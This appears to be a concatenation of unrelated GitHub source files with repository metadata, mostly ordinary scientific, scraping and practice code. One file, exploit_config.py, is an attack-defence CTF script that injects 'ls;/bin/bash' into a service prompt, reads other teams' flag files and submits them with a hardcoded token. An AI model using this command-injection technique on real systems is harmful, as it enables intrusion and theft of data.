endTime = datetime.fromtimestamp(mktime(time.strptime("%s %s %s %s %s" % (timeGroups.group("end_hour"),timeGroups.group("end_minute"), dayOfWeek , timeWeek, year),"%H %M %w %W %Y")))
else:
# Grab the date sections, fx: "15/5-2013 15:30 til 17:00"
dateSections = topSection[0+isChangedOrCancelled].split(" ")
# Grab the date, being the first (0) section
if len(dateSections) == 4:
startDateSection = dateSections[0]
endDateSection = dateSections[0]
startTimeSection = dateSections[1]
endTimeSection = dateSections[3]
else:
startDateSection = dateSections[0]
endDateSection = dateSections[3]
startTimeSection = dateSections[1]
endTimeSection = dateSections[4]
currentTimezone = timezone("Europe/Copenhagen")
alternativeDayProg = re.compile(r"(?P<day>[0-9]*)/(?P<month>[0-9]*)-(?P<year>[0-9]*)")
alternativeStartDayGroups = alternativeDayProg.match(startDateSection.strip())
alternativeEndDayGroups = alternativeDayProg.match(endDateSection.strip())
startTime = datetime.strptime("%s/%s-%s %s" % (functions.zeroPadding(alternativeStartDayGroups.group("day")), functions.zeroPadding(alternativeStartDayGroups.group("month")), alternativeStartDayGroups.group("year"), startTimeSection.strip()), "%d/%m-%Y %H:%M")
endTime = datetime.strptime("%s/%s-%s %s" % (functions.zeroPadding(alternativeEndDayGroups.group("day")), functions.zeroPadding(alternativeEndDayGroups.group("month")), alternativeEndDayGroups.group("year"), endTimeSection.strip()), "%d/%m-%Y %H:%M")
roomText = ""
try:
if not "rer:" in topSection[3 + isChangedOrCancelled]:
room = topSection[3 + isChangedOrCancelled].strip("Lokale: ").encode('utf-8').replace("r: ","")
except IndexError:
pass
if sameDay(startTime, dayOfWeek, timeWeek, year):
if type == "private":
timeElements.append({
"text" : unicode(timetableElement.text),
"activity_id" : groups.group("activity_id"),
"startTime" : startTime,
"endTime" : endTime,
"type" : type,
"school_id" : groups.group("school_id")
})
elif type == "outgoing_censor":
timeElements.append({
"text" : unicode(timetableElement.text),
"outbound_censor_id" : groups.group("outbound_censor_id"),
"startTime" : startTime,
"endTime" : endTime,
"type" : type,
"school_id" : groups.group("school_id")
})
elif type == "exam":
timeElements.append({
"text" : unicode(timetableElement.text),
"test_team_id" : groups.group("test_team_id"),
"startTime" : startTime,
"endTime" : endTime,
"type" : type,
"school_id" : groups.group("school_id")
})
elif type == "school":
# Add to the list
timeElements.append({
"text" : unicode(timetableElement.text),
"activity_id" : groups.group("activity_id"),
"status" : "changed" if "s2changed" in div["class"] else "cancelled" if "s2cancelled" in div["class"] else "normal",
"teachers" : teachers,
"teams" : teams,
"startTime" : startTime,
"endTime" : endTime,
"type" : type,
"location_text" : unicode(div.text),
"room_text" : unicode(roomText),
"school_id" : groups.group("school_id")
})
return {
"status" : "ok",
"timetable" : timeElements,
"information" : generalInformation,
"module_info" : moduleInfo,
"headers" : headers,
"term" : {
"value" : soup.find("select", attrs={"id" : "s_m_ChooseTerm_term"}).select('option[selected="selected"]')[0]["value"],
"years_string" : soup.find("select", attrs={"id" : "s_m_ChooseTerm_term"}).select('option[selected="selected"]')[0].text
}
} | [
"boh1996@gmail.com"
] | boh1996@gmail.com |
62085bac7af2c75ef4995d947ebe57ef7dcf9cb2 | 44a2741832c8ca67c8e42c17a82dbe23a283428d | /cmssw/HeavyIonsAnalysis/JetAnalysis/python/jets/ak6CaloJetSequence_pPb_mix_cff.py | 43faa9de8f5e464f8f33daa997f0ff65a0071833 | [] | no_license | yenjie/HIGenerator | 9ff00b3f98b245f375fbd1b565560fba50749344 | 28622c10395af795b2b5b1fecf42e9f6d4e26f2a | refs/heads/master | 2021-01-19T01:59:57.508354 | 2016-06-01T08:06:07 | 2016-06-01T08:06:07 | 22,097,752 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,457 | py |
import FWCore.ParameterSet.Config as cms
from PhysicsTools.PatAlgos.patHeavyIonSequences_cff import *
from HeavyIonsAnalysis.JetAnalysis.inclusiveJetAnalyzer_cff import *
ak6Calomatch = patJetGenJetMatch.clone(
src = cms.InputTag("ak6CaloJets"),
matched = cms.InputTag("ak6HiGenJetsCleaned")
)
ak6Caloparton = patJetPartonMatch.clone(src = cms.InputTag("ak6CaloJets"),
matched = cms.InputTag("hiGenParticles")
)
ak6Calocorr = patJetCorrFactors.clone(
useNPV = False,
# primaryVertices = cms.InputTag("hiSelectedVertex"),
levels = cms.vstring('L2Relative','L3Absolute'),
src = cms.InputTag("ak6CaloJets"),
payload = "AK6Calo_HI"
)
ak6CalopatJets = patJets.clone(jetSource = cms.InputTag("ak6CaloJets"),
jetCorrFactorsSource = cms.VInputTag(cms.InputTag("ak6Calocorr")),
genJetMatch = cms.InputTag("ak6Calomatch"),
genPartonMatch = cms.InputTag("ak6Caloparton"),
jetIDMap = cms.InputTag("ak6CaloJetID"),
addBTagInfo = False,
addTagInfos = False,
addDiscriminators = False,
addAssociatedTracks = False,
addJetCharge = False,
addJetID = False,
getJetMCFlavour = False,
addGenPartonMatch = True,
addGenJetMatch = True,
embedGenJetMatch = True,
embedGenPartonMatch = True,
embedCaloTowers = False,
embedPFCandidates = False
)
ak6CaloJetAnalyzer = inclusiveJetAnalyzer.clone(jetTag = cms.InputTag("ak6CalopatJets"),
genjetTag = 'ak6HiGenJetsCleaned',
rParam = 0.6,
matchJets = cms.untracked.bool(True),
matchTag = 'akVs6CalopatJets',
pfCandidateLabel = cms.untracked.InputTag('particleFlow'),
trackTag = cms.InputTag("generalTracks"),
fillGenJets = True,
isMC = True,
genParticles = cms.untracked.InputTag("hiGenParticles"),
eventInfoTag = cms.InputTag("hiSignal")
)
ak6CaloJetSequence_mc = cms.Sequence(
ak6Calomatch
*
ak6Caloparton
*
ak6Calocorr
*
ak6CalopatJets
*
ak6CaloJetAnalyzer
)
ak6CaloJetSequence_data = cms.Sequence(ak6Calocorr
*
ak6CalopatJets
*
ak6CaloJetAnalyzer
)
ak6CaloJetSequence_jec = ak6CaloJetSequence_mc
ak6CaloJetSequence_mix = ak6CaloJetSequence_mc
ak6CaloJetSequence = cms.Sequence(ak6CaloJetSequence_mix)
| [
"dgulhan@cern.ch"
] | dgulhan@cern.ch |
3c384528e3389e5fcb5e833afc92533aefd3ebf6 | 6ed76db38374c84161efcf539920756f00fa334c | /aoc2019/day6.py | a89ef49602824bd982eb47a6cd05c5b4c2cc54f1 | [] | no_license | will-snavely/adventofcode | 0eb424bd2887610af4cdc8fa7bbe6db19c94655e | 8e6f66416d508b9042bb78cb931391887fc2da6d | refs/heads/master | 2023-07-23T19:44:24.621404 | 2023-07-13T15:57:04 | 2023-07-13T15:57:04 | 328,174,076 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,424 | py | import collections
test_inputs = [
"inputs/day6"
]
def build_orbit_graph(rules):
children = collections.defaultdict(list)
parent = {}
for rule in rules:
parts = rule.split(")")
children[parts[0]].append(parts[1])
parent[parts[1]] = parts[0]
return children, parent
def count_orbits(children, node, depth):
result = depth
for neighbor in children[node]:
result += count_orbits(children, neighbor, depth + 1)
return result
def path_to_root(parent, start):
path = [start]
cur = start
while cur != "COM":
cur = parent[cur]
path.append(cur)
return path
def process(path):
print("Input:", path)
with open(path) as f:
rules = [line.strip() for line in f.readlines()]
children, parent = build_orbit_graph(rules)
print("\tPart 1:", count_orbits(children, "COM", 0))
you_path = path_to_root(parent, "YOU")
santa_path = path_to_root(parent, "SAN")
santa_nodes = set(santa_path)
ancestor = None
for node in you_path:
if node in santa_nodes:
ancestor = node
break
you_dist = you_path.index(ancestor)
santa_dist = santa_path.index(ancestor)
print("\tPart 2:", you_dist + santa_dist - 2)
def main():
for path in test_inputs:
process(path)
if __name__ == "__main__":
main()
| [
"will.snavely@protonmail.com"
] | will.snavely@protonmail.com |
5a75b711fb29537898981bed0b06a74806f2c9fd | d6ed05e23faa20beb5e47624870608a9219ea81c | /TuningTools_old/scripts/analysis_scripts/dev/Trigger_20161214_20_7_7_3_LHbins/create_data.py | 085d2aa684d3438748ca6040bac02c4a8c3587d0 | [] | no_license | kaducovas/ringer | f6495088c0d54d622dcc707333b4c2fbf132d65f | 603311caab016ad0ef052ea4fcc605c5ac4e494b | refs/heads/master | 2020-06-16T21:37:15.228364 | 2019-07-08T01:29:57 | 2019-07-08T01:29:57 | 195,477,531 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,462 | py | #!/usr/bin/env python
import numpy as np
useLHBins = True
if useLHBins:
etaBins = [0.00,0.60,0.80,1.15,1.37,1.52,1.81,2.01,2.37,2.47]
etBins = [15,20,30,40,50000]
# Thresholds
thres_lh_etavect = [0,0.6,0.8,1.15,1.37,1.52,1.81,2.01,2.37,2.47]
thres_lh_etvect = [4,7,10,15,20,25,30,35,40,45,50]
tight20160701 = np.array( [[0.484,0.532,0.490,0.466,0.252,0.510,0.494,0.384,0.349], # 4 GeV
[0.531,0.599,0.557,0.532,0.381,0.575,0.569,0.454,0.403], # 7 GeV
[0.594,0.641,0.589,0.572,0.416,0.587,0.580,0.554,0.472], # 10 GeV
[0.700,0.692,0.680,0.675,0.589,0.687,0.690,0.624,0.671], # 15 GeV
[0.709,0.686,0.694,0.689,0.646,0.701,0.718,0.677,0.734], # 20 GeV
[0.752,0.749,0.736,0.730,0.561,0.747,0.744,0.708,0.745], # 25 GeV
[0.776,0.773,0.761,0.760,0.614,0.752,0.769,0.728,0.795], # 30 GeV
[0.794,0.791,0.786,0.783,0.629,0.780,0.785,0.766,0.792], # 35 GeV
[0.803,0.795,0.782,0.792,0.613,0.783,0.800,0.780,0.820], # 40 GeV
[0.808,0.795,0.793,0.812,0.647,0.798,0.814,0.799,0.853]] ) * 100. # 45 GeV
medium20160701 = np.array([[0.667,0.674,0.652,0.617,0.343,0.609,0.592,0.576,0.524], # 4 GeV
[0.670,0.737,0.715,0.679,0.527,0.701,0.683,0.587,0.537], # 7 GeV
[0.751,0.778,0.746,0.712,0.549,0.721,0.713,0.707,0.649], # 10 GeV
[0.815,0.804,0.782,0.781,0.677,0.794,0.764,0.742,0.757], # 15 GeV
[0.833,0.810,0.813,0.811,0.735,0.823,0.814,0.802,0.815], # 20 GeV
[0.863,0.860,0.848,0.848,0.656,0.842,0.834,0.827,0.817], # 25 GeV
[0.886,0.873,0.870,0.864,0.681,0.835,0.861,0.829,0.848], # 30 GeV
[0.897,0.894,0.886,0.875,0.714,0.876,0.867,0.842,0.866], # 35 GeV
[0.900,0.891,0.887,0.882,0.708,0.883,0.879,0.862,0.896], # 40 GeV
[0.894,0.895,0.893,0.886,0.719,0.882,0.888,0.869,0.913]] ) * 100. # 45 GeV
loose20160701 = np.array( [[0.813,0.810,0.807,0.781,0.536,0.758,0.739,0.750,0.709], # 4 GeV
[0.819,0.816,0.813,0.787,0.670,0.808,0.789,0.753,0.711], # 7 GeV
[0.853,0.850,0.827,0.801,0.692,0.837,0.818,0.816,0.777], # 10 GeV
[0.886,0.882,0.869,0.858,0.752,0.854,0.855,0.823,0.802], # 15 GeV
[0.897,0.888,0.885,0.884,0.791,0.880,0.871,0.853,0.875], # 20 GeV
[0.921,0.913,0.905,0.894,0.708,0.894,0.875,0.858,0.853], # 25 GeV
[0.934,0.930,0.922,0.912,0.735,0.908,0.909,0.866,0.869], # 30 GeV
[0.942,0.940,0.937,0.930,0.779,0.931,0.931,0.905,0.913], # 35 GeV
[0.947,0.945,0.941,0.934,0.762,0.935,0.936,0.922,0.919], # 40 GeV
[0.951,0.949,0.948,0.943,0.774,0.940,0.944,0.926,0.945]]) * 100. # 45 GeV
veryloose20160701 = np.array([[0.896,0.893,0.890,0.884,0.719,0.875,0.866,0.859,0.821], # 4 GeV
[0.928,0.925,0.922,0.916,0.758,0.906,0.897,0.890,0.854], # 7 GeV
[0.928,0.925,0.922,0.915,0.766,0.906,0.897,0.889,0.856], # 10 GeV
[0.958,0.950,0.932,0.925,0.829,0.920,0.925,0.909,0.876], # 15 GeV
[0.966,0.957,0.955,0.943,0.844,0.943,0.929,0.916,0.904], # 20 GeV
[0.979,0.975,0.962,0.961,0.780,0.956,0.942,0.929,0.919], # 25 GeV
[0.988,0.985,0.980,0.973,0.803,0.961,0.956,0.923,0.922], # 30 GeV
[0.988,0.986,0.984,0.981,0.834,0.976,0.971,0.963,0.960], # 35 GeV
[0.990,0.988,0.987,0.983,0.835,0.978,0.974,0.970,0.972], # 40 GeV
[0.991,0.989,0.988,0.984,0.833,0.979,0.974,0.966,0.976]]) * 100. # 45 GeV
else:
etBins = [15, 20, 30, 40, 50, 500000 ]
etaBins = [0, 0.8 , 1.37, 1.54, 2.5]
tight20160701 = np.array(
# eta 0 0.8 1.37 1.54
[[0.849, 0.83898649, 0.7945, 0.82856316] # Et 15
,[0.866025, 0.85846486, 0.7975, 0.85683684] # Et 20
,[0.892305, 0.88658649, 0.8109, 0.87986105] # Et 30
,[0.9014375, 0.89668919, 0.815, 0.89674474] # Et 40
,[0.902375, 0.90035135, 0.8235, 0.90092632]])*100. # Et 50
medium20160701 = np.array(
# eta 0 0.8 1.37 1.54
[[ 0.906125, 0.8907973, 0.8385, 0.88125263] # Et 15
,[ 0.924125, 0.91683784, 0.8438, 0.91210316] # Et 20
,[ 0.944885, 0.93741676, 0.84908, 0.92400337] # Et 30
,[ 0.948, 0.94378378, 0.85675, 0.93723947] # Et 40
,[ 0.947125, 0.94508108, 0.8595, 0.93848421]])*100. # Et 50
loose20160701 = np.array(
# eta 0 0.8 1.37 1.54
[[ 0.9425, 0.93227027, 0.876, 0.9196 ] # Et 15
,[ 0.95465, 0.94708108, 0.8706, 0.93477684] # Et 20
,[ 0.96871, 0.96318919, 0.87894, 0.95187642] # Et 30
,[ 0.97425, 0.97103378, 0.884, 0.96574474] # Et 40
,[ 0.97525, 0.97298649, 0.887, 0.96703158]])*100. # Et 50
veryloose20160701 = np.array(
# eta 0 0.8 1.37 1.54
[[ 0.978, 0.96458108, 0.9145, 0.95786316]
,[ 0.98615, 0.97850541, 0.9028, 0.96738947]
,[ 0.99369, 0.9900427, 0.90956, 0.97782105]
,[ 0.995, 0.99293919, 0.917, 0.98623421]
,[ 0.99525, 0.99318919, 0.9165, 0.98582632]])*100.
#etaBins = [0, 0.8]
def standardRef( val ):
return np.array( val )
def transformToEFCalo( val ):
return np.array( val ) + (1 - np.array( val ) ) / 2
def mergeEffTable( val ):
import itertools
shape = val.shape
#shorterEtaEffTable = np.zeros( shape=(shape[0], 4) )
# eta 0.0, 0.6, 0.8, 0.15, 1.37, 1.52, 1.81, 2.01, 2.37
#for etIdx, etaIdx in itertools.product( range( shape[0] ), range( 4 ) ):
# if etaIdx == 0: # merge 0 -> .6 -> .8
# shorterEtaEffTable[etIdx,etaIdx] = ( val[etIdx,0]*.6 + val[etIdx,1]*.2 ) / .8
# if etaIdx == 1: # merge 1.15 -> 1.37 -> 1.52
# shorterEtaEffTable[etIdx,etaIdx] = ( val[etIdx,2]*.22 + val[etIdx,3]*.15 ) / .37
# if etaIdx == 2: # 1.37 -> 1.52
# shorterEtaEffTable[etIdx,etaIdx] = val[etIdx,4]
# if etaIdx == 3: # merge 1.52 -> 1.8 -> 2.47
# shorterEtaEffTable[etIdx,etaIdx] = ( val[etIdx,5]*.29 + val[etIdx,6]*.2 + val[etIdx,7]*.46 )/(.95)
shorterEffTable = np.zeros( shape=(4,9) )
for etIdx, etaIdx in itertools.product( range(4), range(9) ):
refIdx = etIdx + 3
if etIdx == 0: # 15 up to 20
shorterEffTable[etIdx,etaIdx] = val[refIdx,etaIdx]
if etIdx == 1: # merge 20, 25
shorterEffTable[etIdx,etaIdx] = (val[refIdx,etaIdx]*.4 + val[refIdx+1,etaIdx]*.6)
if etIdx == 2: # merge 30, 35
shorterEffTable[etIdx,etaIdx] = (val[refIdx+1,etaIdx]*.48 + val[refIdx+2,etaIdx]*.52)
if etIdx == 3: # merge 40, 45
shorterEffTable[etIdx,etaIdx] = (val[refIdx+2,etaIdx]*.5 + val[refIdx+3,etaIdx]*.5)
return shorterEffTable
#for ref in (veryloose20160701, loose20160701, medium20160701, tight20160701):
ref = veryloose20160701
from RingerCore import traverse
if useLHBins:
pdrefs = mergeEffTable( ref )
else:
pdrefs = ref
print pdrefs
pfrefs = np.array( [[0.05]*len(etaBins)]*len(etBins) )*100. # 3 5 7 10
efficiencyValues = np.array([np.array([refs]) for refs in zip(traverse(pdrefs,tree_types=(np.ndarray),simple_ret=True)
,traverse(pfrefs,tree_types=(np.ndarray),simple_ret=True))]).reshape(pdrefs.shape + (2,) )
print efficiencyValues
basePath = '/home/wsfreund/CERN-DATA'
sgnInputFile = 'user.jodafons.mc15_13TeV.361106.PowhegPythia8EvtGen_AZNLOCTEQ6L1_Zee.merge.AOD.e3601_s2876_r7917_r7676.dump.trigPB.p0200_GLOBAL/'
bkgInputFile = 'user.jodafons.mc15_13TeV.423300.Pythia8EvtGen_A14NNPDF23LO_perf_JF17.merge.AOD.e3848_s2876_r7917_r7676.dump.trigEL.p0201_GLOBAL/'
outputFile = 'mc15_13TeV.361106.423300.sgn.trigegprobes.bkg.vetotruth.trig.l2calo.eg.std.grid.veryloose'
treePath = ["HLT/Egamma/Expert/support/probes",
"HLT/Egamma/Expert/support/trigger"]
#crossValPath = 'crossValid_5sorts.pic.gz'
#from TuningTools import CrossValidArchieve
#with CrossValidArchieve( crossValPath ) as CVArchieve:
# crossVal = CVArchieve
# del CVArchieve
import os.path
from TuningTools import Reference, RingerOperation
from TuningTools import createData
from RingerCore import LoggingLevel
createData( sgnFileList = os.path.join( basePath, sgnInputFile ),
bkgFileList = os.path.join( basePath, bkgInputFile ),
ringerOperation = RingerOperation.L2Calo,
referenceSgn = Reference.AcceptAll,
referenceBkg = Reference.Truth,
treePath = treePath,
pattern_oFile = outputFile,
#nClusters = 1000,
etBins = etBins,
etaBins = etaBins,
toMatlab = True,
efficiencyValues = efficiencyValues,
plotProfiles = True,
supportTriggers = True,
doMonitoring = False,
#level = LoggingLevel.VERBOSE
)
| [
"kaducovas@gmail.com"
] | kaducovas@gmail.com |
5973aee2804c87bac3f687c0a8f0b48da17ef309 | 573cb6d132e1a6962e56a1808aa10d4c09b85a84 | /exploit_config.py | df627fc8e8f118fab42f72855b322b6a8b1521f6 | [] | no_license | pramann1/dark-matter | 8cb75b1c3bf17fd58c810238e80256bb95506ec6 | 047622ebf03871a633104c3e2602152908f05341 | refs/heads/master | 2022-04-08T15:27:43.374525 | 2020-03-01T02:03:59 | 2020-03-01T02:03:59 | 241,284,905 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,895 | py | import os
import socket
import select
import sys
import threading
import hashlib
import time
import re
import json
import random
import string
from pwn import *
from timeout import timeout
from collections import defaultdict
import swpag_client
import requests
from bs4 import BeautifulSoup
from multiprocessing import Process, Manager
game_link = 'http://34.195.187.175/'
game_token = 'd3711768d3edb770ab8da755709d176f'
service_port = [10005]
other_teams = []
vulnerability = {[10005: True]}
def vulnerability1(host, port, flag_id):
c = remote(host,port)
c.recvline()
c.recvline()
c.recvline()
c.recvline()
c.recvline()
c.sendline("d")
c.recvline()
c.sendline("value1")
c.recvline()
c.sendline("ls;/bin/bash")
c.recvline()
c.sendline("s")
data=c.recvline()
data=c.recvline()
filename= data[-8:-2].decode("utf-8")
data=c.recvline()
data=c.recvline()
c.sendline("l")
c.recvline()
c.sendline("config_"+filename)
data = c.recvline()
c.sendline("cat config_"+ flag_id )
data = c.recvline()
data = c.recvline()
c.close()
return data[-17:-1].decode('utf-8')
map = {10005: [vulnerability1]}
team = swpag_client.Team(game_link, game_token)
def launch_vul(id, targ, svc):
team_name = targ["team_name"]
hostname = targ["hostname"]
port = targ["port"]
flag_id = targ["flag_id"]
if other_teams and team_name not in other_teams:
return; # Don't do anything here
for i, buf in enumerate(vulnerability[svcid]):
if not enabled:
continue
buf1 = map[svcid][i]
flag = buf1(hostname, port, flag_id)
if flag is not None:
print("Stole flag {0}!".format(flag))
flags.add((team_name, flag))
break
else:
print("Oops looks like other teams have patched")
tick1=0
def getServices():
services = team.get_service_list()
def tick_loop(tick1):
while True:
tick = team.get_tick_info()
if tick["tick_id"] > tick1:
wait = True
if tick1 == 0:
wait = False
tick1 = tick["tick_id"]
print("Tick1", tick1)
if wait:
time.sleep(10)
else:
time.sleep(10)
continue
flags = set()
for svc in services:
svcid = svc["service_id"]
svcport = svc["port"]
targets = team.get_targets(svcid)
for targ in targets:
team_name = targ["team_name"]
hostname = targ["hostname"]
port = targ["port"]
flag_id = targ["flag_id"]
if other_teams and team_name not in other_teams:
continue
for i, buf in enumerate(vulnerability[svcport]):
if not buf:
continue
flag = map[svcport][i](hostname, port, flag_id)
if flag is not None:
print("Stole flag {0}!".format(flag))
flags.add((team_name, flag))
break
else:
print("Error!"")
if flags:
pctflist = list(flags)
flaglist = [str(f[1]) for f in pctflist]
print(flaglist)
final_flag = team.submit_flag(flaglist)
temp1 = {}
for i, (t, flag) in enumerate(pctflist):
temp1[t] = (flag, final_flag[i])
print("All flags here:", temp1)
else:
print("Error - no flags")
t_info = team.get_tick_info()
wait = int(info["approximate_seconds_left"])
while True:
while True:
try:
getServices()
tick_loop(tick1)
except Exception as e:
time.sleep(5)
| [
"noreply@github.com"
] | pramann1.noreply@github.com |
b05d0b27f1d6b15592926bb7c86aec1b7e8cc0cd | ce2c9e82b05e2cdf09bcf56d35efb2044e1950ec | /String/pratice2.py | 9e1ba576364699546971cd47ad6647cc31f8c607 | [] | no_license | imakash3011/PythonFacts | cb6423671680284e2fcdeb5442b3206ddd9f5e3a | c060f2ab917831afe5fd604a82d31a78ebf64f6f | refs/heads/master | 2023-02-27T12:20:49.045203 | 2021-02-05T14:51:40 | 2021-02-05T14:51:40 | 336,299,429 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 986 | py | # title
# st = "how are you"
# print(st.title())
# strip the start and end occrance of target
# st = "ppp how are youpppp"
# print(st.strip("p"))
# reverse a string
# st = "akash"
# print(st[::-1])
# repeat
# import itertools
# print(list(itertools.repeat("akash",5)))
# longest common subsequece
# from difflib import SequenceMatcher
# ab = "abcdefght"
# bb = "abcdklete"
# seqMatch = SequenceMatcher(None, ab, bb)
# mtch = seqMatch.find_longest_match(0, len(ab), 0, len(bb))
# if mtch.size !=0:
# # print(mtch.a, mtch.a+mtch.size)
# print(ab[mtch.a : mtch.a + mtch.size])
# join the list
# s = ['p', 'a', 'g', 'e']
# print("".join(s))
# is title?
# st = "Welcome In India"
# res = st.istitle()
# print(res)
# Is digits
# n = "1212"
# ans = n.isdigit()
# print(ans)
# slicing the string
# st= 'hii how are you man'
# slc = st[3:8]
# print(slc)
# count he occurance of a word in a line
# st = "welcome to geeks for geeks"
# cnt = st.count("geeks")
# print(cnt) | [
"imakashpatel3011@gmail.com"
] | imakashpatel3011@gmail.com |
46debb410fe143f995be88669f3ec46546a5c6dc | 55b324abdc2b07087253a834c26bb11557711d67 | /classes/Model.py | ce23fa51fd5be6d25546824e9fa52c7c6afb7ef0 | [] | no_license | milimi974/OC_Projet_5 | 795c41de6b950c130a3ce7191065af573f8d74f1 | 382f20c886817cb94ed5f59f5840c73235b7ab4b | refs/heads/master | 2021-05-06T13:24:25.577013 | 2017-12-27T22:34:02 | 2017-12-27T22:34:02 | 113,223,632 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,754 | py | #!/usr/bin/env python
# coding: utf-8
""" Module Parent for all class need access to BDD """
# load dependencies
from classes.Database import Database as DB
from classes.Functions import *
class Model(object):
""" That Class manage method for BDD """
def __init__(self, args={}):
""" Constructor
Method arguments:
args -- dict object attribute value
"""
# init attributes
setattr(self, 'PK_id', 0)
if hasattr(self, 'fields') and not self.fields == "" and args:
for field in self.fields:
if field in args:
v = args[field]
if hasattr(self, 'format_fields'):
v = parse_field(self.format_fields, field, v)
setattr(self, field, v)
@property
def __is_error(self):
""" Property tell if can send request to bdd """
# Check if table name set and not empty
if hasattr(self, 'table') and not self.table == "":
return False
return True
def save(self):
""" Method save or update data do bdd """
if not self.__is_error:
fields = list(self.fields)
table = str(self.table)
if hasattr(self, 'PK_id') and int(self.PK_id) > 0:
# Update data
DB.update(table, fields, self,)
else:
# Save data
# if isset primary key id unset
self.PK_id = None
DB.save(table, fields, self)
def find(self, request):
""" Method search multi answer
Keyword arguments:
request -- dict of instructions for database request
"""
table = str(self.table)
format_fields = dict(self.format_fields)
return DB.search(format_fields, table, request, False, self.__class__)
def findone(self, request):
""" Method search one answer
Keyword arguments:
request -- dict of instructions for database request
"""
table = str(self.table)
format_fields = dict(self.format_fields)
return DB.search(format_fields , table, request, True, self.__class__)
def findjoin(self, table1, request, table2=None):
""" Method search join answer
Keyword arguments:
table1 -- str name of main table for JOIN
table2 -- str name join table
request -- dict of instructions for database request
"""
if not table2:
table2 = self.table
format_fields = dict(self.__class__.format_fields)
return DB.search(format_fields, table1, request, False, self.__class__, table2)
def bulk(self, data, update=False, tablename=None, fields=None):
""" method for saving a bulk data
Keyword arguments:
data -- list of product fields value
update -- boolean use active update action
-- for join table --
tablename -- string custom table
fields -- custom fields
"""
if not tablename:
tablename = str(self.table)
if not fields:
fields = list(self.fields)
if not update:
# Call method for save data
DB.save(tablename, fields, data)
else:
# Call method for update data
DB.update(tablename, fields, data)
def search_by(self, args):
""" Make a search on one field
Keyword arguments:
args -- tuple
(
field -- str name of database field
value -- str || list
)
"""
request = {
'fields': 'all',
'where': [
args,
]
}
table = str(self.table)
format_fields = dict(self.format_fields)
return DB.search(format_fields, table, request, False, self.__class__)
def search_ids(self, args):
""" Make a search on one field
Keyword arguments:
args -- tuple
(
field -- str name of database field
value -- str || list
)
"""
request = {
'fields': 'PK_id',
'where': [
args,
]
}
table = str(self.table)
format_fields = dict(self.format_fields)
rep = DB.search(format_fields, table, request, False, self.__class__)
ids = []
if rep:
for el in rep:
ids.append(el.PK_id)
return ids
def search_id(self, args):
""" Make a search on one field then return PK_id
Keyword arguments:
args -- tuple
(
field -- str name of database field
value -- str || list
)
"""
request = {
'fields': 'PK_id',
'where': [
args,
]
}
table = str(self.table)
format_fields = dict(self.format_fields)
rep = DB.search(format_fields, table, request, True, self.__class__)
if rep:
return rep.PK_id
return False
def get_list(self, fields, request):
""" Return a dict with key:value
Keyword arguments:
fields -- tuple for dict key value
request -- tuple search request conditions
"""
query = self.search_by(request)
rep = []
key, value = fields
for el in query:
rep.append((el.__getattribute__(key),el.__getattribute__(value)))
return rep
def delete(self, request):
""" delete element from data base """
table = str(self.table)
DB.delete(table, request) | [
"yohan.solon@gmail.com"
] | yohan.solon@gmail.com |
0ff42ffdcd69c859b093f5e2f320ba03debf77c8 | fea9e7fc8b5ae1752a8917f415ddfcadc62ae540 | /practice/week2/css-selector/sel_books.py | 9e571bd96e24c0ce80be33267c1c92621b9eed3f | [] | no_license | Dadajon/dl-with-big-data | fc85e0dd13aa857b89c9b707faabcfc69b51fe24 | 8e7b543948be0773550a114dc6467627c88e445f | refs/heads/main | 2023-07-26T05:43:02.901241 | 2021-09-09T06:09:43 | 2021-09-09T06:09:43 | 328,919,918 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 564 | py | from bs4 import BeautifulSoup
fp = open("books.html", encoding='utf-8')
soup = BeautifulSoup(fp, 'html.parser')
sel = lambda q: print(soup.select_one(q).string)
sel("#nu") # id로 찾는 방법
sel("li#nu") # id와 tag로 찾는 방법
sel("ul > li#nu") # 부모 tag로 id와 tag로 찾는 방법
sel("#bible #nu") # id로 아래의 id를 찾는 방법
sel("#bible > #nu") # id 끼리 부모자식 관계를 나타낸것
sel("ul#bible > li#nu") #
sel("li[id='nu']")
sel("li:nth-of-type(4)")
print(soup.select("li")[3].string)
print(soup.find_all("li")[3].string) | [
"dadajonjurakuziev@gmail.com"
] | dadajonjurakuziev@gmail.com |
41da231ac8b5c5b4173b3d7a9391a341557523f9 | 8acc783c61f86bbcb75fb884db3986e47a78d228 | /fullstack-nanodegree-vm/vagrant/tournament/tournament_test.py | ab5e58c336b0a5a489297e9b0f1935c3db9e14fb | [] | no_license | barefootlance/udacity-fullstack-p3 | 9469c0f09dd8dce5f99a6071a22c55aee838a59f | 1f24fde32951b18ae9e92ccb0b04c720c704546a | refs/heads/master | 2016-08-08T06:37:44.689146 | 2015-09-16T17:23:57 | 2015-09-16T17:23:57 | 40,791,337 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,695 | py | #!/usr/bin/env python
#
# Test cases for tournament.py
from tournament import *
def testDeleteMatches():
deleteMatches()
print "1. Old matches can be deleted."
def testDelete():
deleteMatches()
deletePlayers()
print "2. Player records can be deleted."
def testCount():
deleteMatches()
deletePlayers()
c = countPlayers()
if c == '0':
raise TypeError(
"countPlayers() should return numeric zero, not string '0'.")
if c != 0:
raise ValueError("After deleting, countPlayers should return zero.")
print "3. After deleting, countPlayers() returns zero."
def testRegister():
deleteMatches()
deletePlayers()
registerPlayer("Chandra Nalaar")
c = countPlayers()
if c != 1:
raise ValueError(
"After one player registers, countPlayers() should be 1.")
print "4. After registering a player, countPlayers() returns 1."
def testRegisterCountDelete():
deleteMatches()
deletePlayers()
registerPlayer("Markov Chaney")
registerPlayer("Joe Malik")
registerPlayer("Mao Tsu-hsi")
registerPlayer("Atlanta Hope")
c = countPlayers()
if c != 4:
raise ValueError(
"After registering four players, countPlayers should be 4.")
deletePlayers()
c = countPlayers()
if c != 0:
raise ValueError("After deleting, countPlayers should return zero.")
print "5. Players can be registered and deleted."
def testStandingsBeforeMatches():
deleteMatches()
deletePlayers()
registerPlayer("Melpomene Murray")
registerPlayer("Randy Schwartz")
standings = playerStandings()
if len(standings) < 2:
raise ValueError("Players should appear in playerStandings even before "
"they have played any matches.")
elif len(standings) > 2:
raise ValueError("Only registered players should appear in standings.")
if len(standings[0]) != 5:
raise ValueError("Each playerStandings row should have five columns.")
